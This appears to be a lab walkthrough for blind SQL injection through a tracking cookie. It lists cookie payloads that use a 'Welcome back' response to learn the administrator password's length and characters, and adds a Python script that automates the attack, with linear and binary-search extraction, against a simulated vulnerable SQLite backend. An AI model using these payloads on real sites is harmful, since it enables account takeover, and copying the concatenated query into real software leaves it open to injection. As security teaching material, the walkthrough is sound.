This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

1. Intercept a request that contains the TrackingId cookie (for example with Burp Proxy) and modify the cookie, changing it to: TrackingId=x'+OR+1=1--. Verify that the "Welcome back" message appears in the response. In these payloads, + is the URL-encoded space, and the trailing -- turns the remainder of the original query, including its closing quote, into a comment.
2. Now change it to: TrackingId=x'+OR+1=2--. Verify that the "Welcome back" message does not appear in the response. This demonstrates how you can test a single boolean condition and infer the result.
3. Now change it to: TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'--. Verify that the condition is true, confirming that there is a user called administrator. The UNION must produce the same number of columns as the original query, hence the single literal 'a'; it contributes a row, and so the "Welcome back" message, only when its WHERE clause is satisfied.
4. The next step is to determine how many characters are in the password of the administrator user. To do this, change the value to: TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+length(password)>1--. This condition should be true, confirming that the password is greater than 1 character in length.
5. Send a series of follow-up values to test different password lengths. Send: TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+length(password)>2--. Then send: TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+length(password)>3--. And so on. You can do this manually using Burp Repeater, since the length is likely to be short. When the condition stops being true (i.e. when the "Welcome back" message disappears), you have determined the length of the password, which is in fact 20 characters long.
6. After determining the length of the password, the next step is to test the character at each position to determine its value. This involves a much larger number of requests, so use Burp Intruder. Change the value of the cookie to: TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+substring(password,1,1)='a'--. This uses the substring() function to extract a single character from the password, and test it against a specific value. Our attack will cycle through each position and possible value, testing each one in turn.
7. Place payload position markers around the final a character in the cookie value. To do this, select just the a, and click the "Add §" button. You should then see the following as the cookie value (note the payload position markers): TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+substring(password,1,1)='§a§'--. The attack's payloads are the candidate characters; a response that contains "Welcome back" identifies the character at that position. Repeat for each of the 20 positions by changing the second argument of substring().
For more advanced users, the solution described here could be made more elegant in various ways. For example, instead of iterating over every character, you could perform a binary search of the character space. Or you could create a single Intruder attack with two payload positions and the "Cluster bomb" attack type, and work through all permutations of offsets and character values.
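The whole procedure above, plus the binary-search refinement just mentioned, as an added example that is not part of the lab or of PortSwigger's own material. It assumes a simulated backend: an in-memory SQLite database (the lab's real database engine is not stated on this page) holding a constructed 20-character administrator password, a tracking query that concatenates the cookie value, swallows errors and emits "Welcome back" only when rows come back, and a hand-registered substring() function so the page's payloads run on older SQLite builds that lack it. The payloads are the write-up's, sent with the URL-encoded + decoded to spaces; every name in the block (VulnerableApp, oracle, find_length, extract_linear, extract_binary, run_attack) is this example's own.

```python
import sqlite3

# Constructed stand-in for the administrator's password (20 lowercase alphanumerics,
# like the lab's). It is not the lab's real value; the attacker code never reads it.
SECRET_PASSWORD = "q7b2x9k4m1p8z5n3w6r0"
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


class VulnerableApp:
    """Model of the lab backend: cookie spliced into SQL, results and errors hidden,
    but 'Welcome back' leaks whether the query returned any rows."""

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        # SQLite only gained substring() as an alias of substr() in 3.34; registering
        # it explicitly keeps the page's payloads working on any build.
        self.conn.create_function(
            "substring", 3,
            lambda s, start, n: None if s is None else s[start - 1:start - 1 + n])
        self.conn.executescript("""
            CREATE TABLE tracking (id TEXT);
            CREATE TABLE users (username TEXT, password TEXT);
            INSERT INTO tracking VALUES ('xyz');
            INSERT INTO users VALUES ('wiener', 'peter');
        """)
        self.conn.execute("INSERT INTO users VALUES ('administrator', ?)", (SECRET_PASSWORD,))
        self.requests = 0  # request counter, to compare the two extraction strategies

    def handle_request(self, tracking_id):
        """Return the HTML body for a request carrying TrackingId=<tracking_id>."""
        self.requests += 1
        # Deliberately vulnerable: the cookie value is concatenated into the query.
        sql = "SELECT id FROM tracking WHERE id = '" + tracking_id + "'"
        try:
            rows = self.conn.execute(sql).fetchall()
        except sqlite3.Error:
            rows = []  # errors are swallowed: nothing about them reaches the response
        return "<h1>Home</h1>" + ("<p>Welcome back!</p>" if rows else "")


def oracle(app, condition):
    """True iff CONDITION holds for the administrator row (steps 3 to 7)."""
    payload = ("x' UNION SELECT 'a' FROM users WHERE username='administrator' "
               "AND " + condition + "--")
    return "Welcome back" in app.handle_request(payload)


def confirm_injection(app):
    """Steps 1 and 2: a true and a false condition must give different responses."""
    return ("Welcome back" in app.handle_request("x' OR 1=1--")
            and "Welcome back" not in app.handle_request("x' OR 1=2--"))


def find_length(app, max_len=64):
    """Steps 4 and 5: raise the threshold until length(password)>N stops being true."""
    n = 1
    while oracle(app, "length(password)>%d" % n):
        n += 1
        if n > max_len:
            raise RuntimeError("password longer than max_len, or oracle always true")
    return n


def extract_linear(app, length):
    """Steps 6 and 7: the Intruder-style attack, trying every candidate per position."""
    chars = []
    for pos in range(1, length + 1):
        for ch in CHARSET:
            if oracle(app, "substring(password,%d,1)='%s'" % (pos, ch)):
                chars.append(ch)
                break
        else:
            raise RuntimeError("no candidate matched at position %d" % pos)
    return "".join(chars)


def extract_binary(app, length):
    """Binary search over the sorted character space with a > comparison: about 6
    requests per position instead of up to 36. Assumes the database orders single
    characters byte-wise (SQLite's BINARY collation); against a target with a locale
    collation, compare code points via the engine's ascii()/unicode() function instead."""
    space = sorted(CHARSET)
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, len(space) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(app, "substring(password,%d,1)>'%s'" % (pos, space[mid])):
                lo = mid + 1   # the character sorts after space[mid]
            else:
                hi = mid       # the character is space[mid] or sorts before it
        chars.append(space[lo])
    return "".join(chars)


def run_attack():
    """Run the whole procedure against the simulated app and report request counts."""
    app = VulnerableApp()
    if not confirm_injection(app):
        raise RuntimeError("no boolean oracle: responses do not differ")
    length = find_length(app)
    app.requests = 0
    linear = extract_linear(app, length)
    linear_requests = app.requests
    app.requests = 0
    binary = extract_binary(app, length)
    binary_requests = app.requests
    return {"length": length, "linear": linear, "linear_requests": linear_requests,
            "binary": binary, "binary_requests": binary_requests}


if __name__ == "__main__":
    print(run_attack())
```

Running the script prints the recovered length and password from both strategies together with the number of requests each needed. The linear scan is exactly what the Intruder attack does per position; the binary search is the refinement the paragraph above suggests, and it is only sound when the comparison operator orders characters the way the attacker assumes, which is why the comment in extract_binary points at code-point comparison for real targets.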